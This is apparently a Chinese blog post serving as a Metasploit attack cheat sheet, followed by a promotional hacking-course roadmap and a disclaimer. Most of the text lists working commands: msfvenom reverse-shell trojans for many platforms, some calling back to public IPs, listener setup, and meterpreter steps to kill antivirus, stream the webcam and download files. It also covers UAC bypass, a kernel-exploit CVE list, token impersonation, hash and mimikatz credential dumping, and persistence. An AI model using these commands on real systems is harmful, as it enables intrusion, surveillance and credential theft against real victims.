模块含义auxiliary主要包含渗透测试中一些辅助性脚本这些脚本功能有扫描嗅探破解注入漏洞挖掘等。encoders编码工具用于躲过入侵检测和过滤系统。exploit主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下这里边包括的 exp 的路径的命名规则是系统/服务/模块在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如 use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)payload攻击载荷是攻击者发送给系统执行的指令的。payload主要是在目标机执行的exploits是在本地执行作用于目标机。post该目录存放exploits执行成功后向目标机发送的一些功能性指令如提权、获取hash等。常用命令search //搜索 use编号 //利用 show options //查看参数 info //展示出指定渗透攻击或模块的相关信息 set //设置参数 run //执行 back //退出当前模块常用载荷使用(不强调大小写)RHOSTS //对方ip LHOSTS //自己ip RPORT //端口一般默认的就行 VERBOSE //打印输出显示当前在干什么 STOP_ON_SUCCESS //破解成功后停止操作 USER_FILE //接用户名字典 PASS_FILE //接密码字典sshsearch ssh_logmysql大概意思同上攻击在本地环境使用samba进行攻击会出现这个原因是Windows是中文的要英文版即可远程的不管是否能行试一下就可以生成木马windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.0.110 LPORT4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORTAttack Port -f dll /root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST192.168.134.131 LPORT8899 RC4PASSWORDadmin123456qqq -f dll -o ~/y.dll msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.142.4 lport1212 -e x86/shikata_ga_nai -i 5 -f c t.c msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.133.132 lport1212 -e x86/shikata_ga_nai -i 5 -f raw test.c msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b \x00 lhost10.211.55.2 lport3333 -f raw -o shellcode.raw msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex LHOST192.168.134.131 LPORT4444 -o msf.txt安卓appmsfvenom -p android/meterpreter/reverse_tcp LHOST192.168.85.130 LPORT6666 -o ~/Desktop/test2.apkLinux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.85.130 LPORT6666 -f elf shell.elf msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST34.92.252.2 LPORT10053 -f elf cloud msfvenom -p linux/x64/meterpreter_reverse_https LHOST192.168.134.131 LPORT6666 -f elf shell msfvenom -p cmd/unix/reverse_bash lhost34.92.252.2 lport10001 RMac:msfvenom -p osx/x86/shell_reverse_tcp LHOST192.168.85.130 LPORT6666 -f macho shell.machoPHPmsfvenom -p php/meterpreter/reverse_tcp LHOST192.168.20.27 LPORT4444 -f raw -o test.phpASP:msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.85.130 LPORT6666 -f asp shell.aspASPXmsfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.85.130 LPORT6666 -f aspx shell.aspxJSP:msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.85.130 LPORT6666 -f raw shell.jspBashmsfvenom -p cmd/unix/reverse_bash LHOST192.168.85.130 LPORT6666 -f raw shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST192.168.85.130 LPORT6666 -f raw shell.plPythonmsfvenom -p python/meterpreter/reverser_tcp LHOST192.168.85.130 LPORT6666 -f raw shell.pyjavamsfvenom -p java/meterpreter/reverse_tcp LHOST192.168.1.7 LPORT4444 W text.jarwarmsfvenom -p java/jsp_shell_reverse_tcp LHOSTip LPORT端口 -f war shell.war msfvenom -p java/meterpreter/reverse_http LHOSTip LPORT端口 -f war shell.warpowershellmsfvenom -p windows/x64/meterpreter_reverse_http LHOSTYour IP Address LPORT Your Port to Connect On -f psh shell.ps1 powershell.exe -ExecutionPolicy Bypass -File shell.ps1Create Usermsfvenom -p windows/adduser USERhacker PASSHacker123$ -f exe adduser.exe大致步骤在攻击机上开启监听use exploit/multi/handler上面生成的马开启的是哪个就设置哪个开启监听并在目标机上运行木马反弹成功后常用命令进程迁移ps //查看目标机正在运行的进程 getpid //查看当前进程 migrate N//迁移进程N为PID号有些可能会迁移失败多试几个 run post/windows/manage/migrate //自动迁移进程 kill N //强制结束进程N为PID号进程迁移后原先的进程会自动销毁如果没有销毁则使用kill强制杀掉meterpreter命令sysinfo //查看目标系统命令 run post/windows/gather/checkvm //查看是否运行在虚拟机上 route //查看网络设置 run post/windows/manage/killav //关闭杀毒软件 background //把当前会话放入后台会给出个session值回到会话参照图一任何地方都是可以回去的 getuid //查看当前用户 run post/windows/manage/enable_rdp //开启远程桌面 run post/multi/manage/autoroute //自动添加路由 route add 0.0.0.0 0.0.0.0 4 //手动添加路由全网段4表示session值 见图三 route print // 查看已添加对的路由 见图三 run post/windows/gather/enum_applications //目标机上的应用程序 run post/windows/gather/credentials/windows_autologin //抓取自动登录的用户名和密码一般不行 load espia //加载Espia插件 screengrab //抓取目标机的屏幕截图先加载Espia再用此命令 screenshare //实时显示目标机屏幕 webcam_list //查看目标机有无摄像头 webcam_snap //抓取照片 webcam_stream //摄像头直播 shell //进入目标机shell exit //返回 pwd //查看当前处于目标机哪个目录 cd C:\\Users\\华扬\\Desktop 切换目录当然也可以加转义字符 search -f *.txt -d C:\\Users\\华扬\\Desktop //搜索文件要搜索整台电脑search -f *.txt即可 download C:\\Users\\华扬\\Desktop\\新建文本文档.txt /root //下载目标文件 upload /home/huayang/123.exe C:\\Users\\华扬\\Desktop //上传文件到目标机器图一图二图三提权相关命令chcp 65001 //在shell下执行以防止乱码getsystem提权可能性较低可以试一下getsystembypassuacsearch bypassuac /下面的项目都是可以用于提权的exploit/windows/local/bypassuac //成功率最高 exploit/windows/local/bypassuac_eventvwr //成功率最高 windows/local/bypassuac_vbs//成功较高 exploit/windows/local/bypassuac_injection //针对x86 exploit/windows/local/bypassuac_comhijack//针对x86 windows/local/ask exploit/windows/local/bypassuac_sdclt //强烈不建议使用 exploit/windows/local/bypassuac_dotnet_profiler//强烈不建议使用提权并不是马上成功后面还需要加上getsystem内核提权方法一run post/windows/gather/enum_patches //查询已安装的补丁 use post/multi/recon/local_exploit_suggester //查询可使用漏洞结果可信度较低不妨一试查询的补丁如msf没有可在github下载https://github.com/SecWiki/windows-kernel-exploits方法二用systeminfo查看安装了哪些补丁然后再在下表对应版本找哪些补丁没有安装搜索编号攻击即可CVE-2021-1732 [Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】Windows 7/8/10、2008/2012/2016/2019 CVE-2020-0796 [Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909 ) CVE-2019-1458 [当Win32k组件无法正确处理内存中的对象时Windows中存在一个特权提升漏洞]Windows 7/8/10/2008/2012/2016 CVE-2019-0803 [Win32k 组件无法正确处理内存中的对象时Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [Win32k 组件无法正确处理内存中的对象时Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016) CVE-2018-1038 [Windows 内核提权漏洞]Windows 7 SP1/Windows Server 2008 R2 SP1 CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability]Windows 10 版本 1703/Windows 10 版本 1709/Windows Server 版本 1709 CVE-2018-8453 [Windows Win32k 组件中的提权漏洞] ( windows 8.1) CVE-2018-8440 [Windows ALPC 提权漏洞] (windows 7/8.1/10/2008/2012/2016) MS17-017 [KB4013081] [GDI 调色板对象本地权限提升]Windows 7/8 CVE-2017-8464 [LNK远程执行代码漏洞]Windows 10 / 8.1 / 7/2016/2010/2008 CVE-2017-0213 [Windows COM 提权漏洞] (windows 10/8.1/7/2016/2010/2008) CVE-2018-0833 [SMBv3 空指针取消引用拒绝服务] (Windows 8.1/Server 2012 R2) CVE-2018-8120 [Win32k 提权漏洞] (Windows 7 SP1/2008 SP2,2008 R2 SP1) MS17-010 [KB4013389] [Windows 内核模式驱动程序] (windows 7/2008/2003/XP) MS16-135 [KB3199135] [Windows 内核模式驱动程序] (2016) MS16-111 [KB3186973] [内核 API] (Windows 10 10586 (32/64)/8.1) MS16-098 [KB3178466] [内核驱动程序] (Win 8.1) MS16-075 [KB3164038] [热土豆] (2003/2008/7/8/2012) MS16-034 [KB3143145] [内核驱动程序] (2008/7/8/10/2012) MS16-032 [KB3143141] [辅助登录句柄] (2008/7/8/10/2012) MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) MS16-014 [K3134228] [远程代码执行] (2008/Vista/7) MS15-097 [KB3089656] [远程代码执行] (win8.1/2012) MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) MS15-061 [KB3057839] [内核驱动程序] (2003/2008/7/8/2012) MS15-051 [KB3057191] [Windows内核模式驱动程序]2003/2008/7/8/2012 MS15-015 [KB3031432] [内核驱动程序] (Win7/8/8.1/2012/RT/2012 R2/2008 R2) MS15-010 [KB3036220] [内核驱动程序] (2003/2008/7/8) MS15-001 [KB3023266] [内核驱动程序] (2008/2012/7/8) MS14-070 [KB2989935] [内核驱动程序] (2003) MS14-068 [KB3011780] [域权限提升] (2003/2008/2012/7/8) MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8) MS14-066 [KB2992611] [Windows Schannel 允许远程代码执行] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1) MS14-040 [KB2975684] [AFD 驱动程序] (2003/2008/2012/7/8) MS14-002 [KB2914368] [NDProxy] (2003/XP) MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7) MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7) MS13-005 [KB2778930] [内核模式驱动程序] (2003/2008/2012/win7/8) MS12-042 [KB2972621] [服务总线] (2008/2012/win7) MS12-020 [KB2671387] [RDP] (2003/2008/7/XP) MS11-080 [KB2592799] [AFD.sys] (2003/XP) MS11-062 [KB2566454] [NDISTAPI] (2003/XP) MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP) MS11-011 [KB2393802] [内核驱动程序] (2003/2008/7/XP/Vista) MS10-092 [KB2305420] [任务计划程序] (2008/7) MS10-065 [KB2267960] [FastCGI]IIS 5.1、6.0、7.0 和 7.5 MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista) MS10-048 [KB2160329] [win32k.sys] (XP SP2 SP3/2003 SP2/Vista SP1 SP2/2008 Gold SP2 R2/Win7) MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP) MS10-012 [KB971468] [SMB 客户端 Trans2 堆栈溢出] (Windows 7/2008R2) MS09-050 [KB975517] [远程代码执行] (2008/Vista) MS09-020 [KB970483] [IIS 6.0]IIS 5.1 和 6.0 MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista) MS08-068 [KB957097] [远程代码执行] (2000/XP) MS08-067 [KB958644] [远程代码执行] (Windows 2000/XP/Server 2003/Vista/Server 2008) MS08-066 [KB956803] [AFD.sys] (Windows 2000/XP/Server 2003) MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista) MS06-040 [KB921883] [远程代码执行] (2003/xp/2000) MS05-039 [KB899588] [PnP 服务] (Win 9X/ME/NT/2000/XP/2003) MS03-026 [KB823980] [RPC接口中的缓冲区溢出]/ NT / 2000 / XP / 2003https://github.com/SecWiki/windows-kernel-exploits令牌窃取基础知识令牌(Token)就是系统的临时秘钥相当于账户名和密码用来决定是否允许这次请求和判断这次请求是属于那个用户的。他允许你在不提供密码或其他凭证的前提下访问网络和系统资源相关命令use incognito //加载模块 list_tokens -u //列出可用的token先加载模块才可以使用这个 impersonate_token token //伪造令牌token记得使用\\实战利用用win7和winsever2012在普通用户下都只有一个token其实令牌的数量取决于shell的访问级别也就是获取的权限当我提权为system级别时多出来三个令牌实战中可能有些普通用户有高权限令牌不然怎么叫提权呢这里为了实验就只能将就一下了我们现在拥有的是system权限我们就用此方法降权试试看原理都是相同的只要有令牌正反都可试试看降为user权限也就是WIN-GT4B41U3H8D\华扬一系列操作过后发现可行感觉此方法多用于降权使用注意在输入tooken是记得要输入双反斜杠(\)Hash攻击基础命令hashdump //导出目标机sam的hash值 run post/windows/gather/smart_hashdump //更为强大的导出目标机sam的hash值实战利用hash模块这条命令需要管理员权限和管理员权限的进程才能使用我现在是管理员权限依旧报错同时还需要管理员权限的进程才可以使用很很显然我们现在的是普通用户的运行程序找到含有system权限的进程我们在system权限下把进程迁入2304这个进程成功拿到hash值格式为用户名称: RID:LM-HASH 值: NT-HASH 值rid 是 windows 系统账户对应固定的值类似于 linux 的 uidgid 号500 为 administrator501 为 guest 等。而 lm 的 hash 和 nt 的 hash他们都是对用户密码进行的加密只不过加密方式不一样。复制其中一种加密的 hash 可以直接使用在线 cmd5 破解smart_hashdump相较于hashdump smart_hashdump则更加强大不需要system进程还不会乱码win7以上的系统还需要绕过UAC也就是还是要system下才能运行其中这个解出来就为管理员密码QuarksPwDump拿到shell后我们需要把文件传到目标机现在我们是低权限不能随便传目录只有传送users目录下的用户不知道用户名怎么办我们先cd c:\users再ls看看即可知道了用户名我们最好传入文档里(记得是两个反斜杠\)也就是C:\Users\华扬\Documents经过测试这种方法只能使用windows xp系统xp随便传入哪里都不需要使用管理用户所以我们就直接传入xp的c盘kiwi模块(也就是老版本的mimikatz)基础命令load kiwi //开启模块 creds_all //获取密码 kiwi_cmd sekurlsa::logonpasswords //获取密码实战这个必须要system权限才能使用所以也没啥用移植漏洞利用代码模块这里以永恒之蓝为例地址https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/权限维持Persistence模块run prsistence -A -S -U -i 10 -p 2333 -r 172.16.181.8 A:自动启动payload程序 S:系统启动时加载 U:用户登录时自动启动 i:回连的时间间隔 p:监听反向连接端口号 r:目标机器IP地址本地测试未果使用成功会返还一个sessionMetsvc 模块run metsvc -A会在目标机器上开一个服务监听31337端口利用handler下的windows/metsvc_bind_tcp模块重新获得shell本地实验还是失败不知道为啥会死亡免费福利黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2025最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2025最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。**读者福利 |**【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享**安全链接放心点击**!网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失